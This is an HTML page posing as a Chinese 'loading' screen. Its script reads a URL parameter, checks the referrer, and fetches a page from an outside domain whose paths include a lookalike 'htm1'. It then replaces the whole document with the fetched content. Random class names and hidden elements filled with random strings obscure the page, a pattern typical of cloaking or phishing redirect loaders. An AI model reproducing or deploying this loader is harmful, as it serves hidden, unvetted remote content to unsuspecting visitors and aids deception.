<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RHkNov {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RHkNov .jrQ2UIkox {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RHkNov .content {
            line-height: 50px;
            text-align: center
        }

        .RHkNov .img {
            width: 100%
        }

        .RHkNov .YJrqAWL {
            text-align: center
        }

        .RHkNov .YJrqAWL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RHkNov .YJrqAWL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RHkNov .YJrqAWL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RHkNov .YJrqAWL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RHkNov .YJrqAWL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RHkNov .YJrqAWL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RHkNov .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DApdccWIb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var HJPXst = DApdccWIb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ HJPXst +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ HJPXst +".html?a=share";
		}
		
        KCO8kfA=url+"#"+new Date().getTime();
        KCO8kfA && function() {
            $.get(KCO8kfA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >i27CUwYYvhoe3zvoMNFEb08WMxejWdJBWLJIRhYLjUSIPm0cUs0jQRB5ri9wzbG6dxpRaNSZAMHsPEM9g1</h1>
<ul style='display:none' >TJaekWDldC66Jz3v8s2SQCJt8bD04c5kUF6q1HN6AO6MlSXN4VJ6s</ul>
<img  src='' style='display:none'>
<li style='display:none' >yA3JSVTIeiBocgd4ji0C4BQsMEpEuSu7Q1iN7AfYBghsvM6BoKI06gvCfa</li><div class="RHkNov">
    <div class="jrQ2UIkox">
        <div class="YJrqAWL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >qV7ySJLRUJN8dwHGWC6bTXLWGZaSSe1DPmekvnviyFt15PxtO</ul>
<b style='display:none' >jWg4G4Zs6NAXy9lIIt27lMfEwME9oyAk6GsmbAY6bIPhpoXtsclJ</b>
<b style='display:none' >jWg4G4Zs6NAXy9lIIt27lMfEwME9oyAk6GsmbAY6bIPhpoXtsclJ</b>
<span style='display:none'>X4OtTejnEG8gHtiIsalTvNiNz5zQeYO9FbspVMKKMeI</span></body>
</html>